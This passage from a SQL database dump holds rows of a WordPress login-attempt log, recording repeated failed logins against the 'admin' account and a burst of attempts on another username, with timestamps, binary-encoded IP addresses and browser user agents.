Firefox/62.0'),(6124,8288,1629592468.419301,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6125,8289,1629592851.778765,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6126,8290,1629593221.272820,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��_�+�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6127,8291,1629593594.924036,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6128,8292,1629593955.263127,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����i_','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6129,8293,1629594321.441525,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@sP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6130,8294,1629594686.464181,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@sP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6131,8295,1629595102.666493,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���l��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6132,8296,1629595340.173226,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��j4��','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'),(6133,8297,1629595343.350082,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6134,8298,1629595344.703448,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6135,8299,1629595346.076999,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6136,8300,1629595346.995721,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6137,8301,1629595347.883893,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6138,8302,1629595348.790379,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6139,8303,1629595349.651114,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6140,8304,1629595351.304304,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6141,8305,1629595352.226444,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6142,8305,1629595352.269561,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6143,8306,1629595353.282826,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6144,8306,1629595353.406696,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6145,8307,1629595354.378877,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6146,8308,1629595355.264955,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6147,8309,1629595356.148700,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6148,8309,1629595356.190695,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6149,8310,1629595357.031346,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6150,8310,1629595357.048327,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6151,8311,1629595358.430944,1,'loginFailInvalidUsername','philtucker',0,'\0\0\0\0\0\0\0\0\0\0��Q\\�R','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(6152,8314,1629595479.461252,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6153,8315,1629595840.247628,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@w�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6154,8316,1629596260.561604,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��� �A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6155,8317,1629596530.705657,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36'),(6156,8318,1629596646.456010,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6157,8318,1629596646.639891,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ՈLB','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6158,8319,1629597021.389134,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6159,8320,1629597719.698900,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#��','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36'),(6160,8321,1629598192.955212,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Dc�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6161,8322,1629598551.108397,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6162,8322,1629598551.654956,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6163,8323,1629598982.256542,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����@','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(6164,8324,1629599003.402306,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6165,8325,1629599404.867509,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6166,8326,1629599777.230556,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6167,8327,1629600114.588756,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(6168,8328,1629600175.327105,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Q�n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6169,8329,1629600577.533523,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6170,8330,1629600973.898993,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N�(�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6171,8331,1629601315.497006,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ʽ��','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36'),(6172,8332,1629601794.883510,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6\'iX','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6173,8333,1629602181.025994,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���3�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6174,8334,1629602580.083819,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c\no','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6175,8335,1629602982.105489,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���Vw�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6176,8336,1629603393.643620,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@om�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6177,8337,1629603784.322099,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���,�7','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6178,8338,1629604189.354012,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6179,8339,1629604598.161010,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���:��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6180,8340,1629604966.181891,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"Q�n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6181,8341,1629605288.793964,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6182,8342,1629605557.739072,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����D','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6183,8343,1629605833.268030,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����2','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6184,8344,1629606065.731497,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6185,8345,1629606307.966694,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����ʰ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6186,8346,1629606564.394399,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6187,8347,1629606605.275838,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���}7�','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.109 Safari/537.36'),(6188,8348,1629606796.645367,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6189,8349,1629606998.602807,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#ݵ�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6190,8350,1629607270.761190,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���q�t','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6191,8351,1629607467.260155,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���c/','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6192,8352,1629607735.856842,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6193,8353,1629607761.969139,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#���','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36'),(6194,8354,1629607963.019094,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���F��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6195,8355,1629608188.638086,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6196,8356,1629608446.615302,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6197,8357,1629608658.380748,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���O�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6198,8358,1629608887.560537,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���5T�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6199,8359,1629608907.521770,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��F$R','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(6200,8360,1629609098.459280,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���\n�u','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6201,8361,1629609332.176929,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��?�)','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6202,8362,1629609602.281635,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[K ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6203,8363,1629609798.926276,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���:��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6204,8364,1629610038.130416,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ár�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6205,8365,1629610041.454441,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���A�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36'),(6206,8366,1629610268.991676,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@rP','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6207,8367,1629610765.938106,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��O���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6208,8368,1629611166.016103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\"z[','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36'),(6209,8369,1629611191.470297,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;�.','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6210,8370,1629611436.466383,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-wT�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6211,8371,1629611841.262772,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��k�ar','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6212,8372,1629612099.591594,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���~�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6213,8373,1629612289.468306,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����gI','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.130 Safari/537.36'),(6214,8374,1629612561.531764,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\\>cc','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6215,8375,1629612772.952478,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#y�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6216,8376,1629613012.247856,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��Oe,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6217,8377,1629613240.471552,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��H\"\"�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6218,8378,1629613470.589371,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>ҹ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6219,8379,1629613680.088969,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6220,8380,1629613935.490890,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���oC�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6221,8381,1629614140.518527,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����=','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6222,8382,1629614355.260377,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���@u�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6223,8383,1629614601.574759,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���zR','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6224,8383,1629614601.686228,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���zR','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6225,8384,1629614848.625747,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��n-p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6226,8385,1629615081.549800,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��DB�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6227,8386,1629615314.102842,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����R','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6228,8387,1629615551.385586,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���m~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6229,8388,1629615796.835258,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6230,8388,1629615796.869494,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����~�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6231,8389,1629616088.606206,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��\rQ(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6232,8390,1629616312.454738,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e >�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6233,8391,1629616580.184139,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���m~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6234,8392,1629616825.841554,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��12�k','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6235,8393,1629617076.529829,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��J(/�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6236,8394,1629617318.395459,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��� �A','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6237,8395,1629617560.969955,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��@Z0h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6238,8396,1629617820.443734,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���VE3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6239,8397,1629618061.889095,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���O�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6240,8398,1629618315.992607,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����6p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6241,8399,1629618573.087107,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��go(','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6242,8400,1629618825.756369,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����؛','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6243,8400,1629618825.794243,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����؛','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6244,8401,1629618983.423762,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ʽ��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36'),(6245,8402,1629619091.723738,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��)�@K','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6246,8403,1629620082.159232,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���^�M','Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'),(6247,8404,1629620378.851047,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��E��s','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(6248,8405,1629621177.309980,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��C��','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) 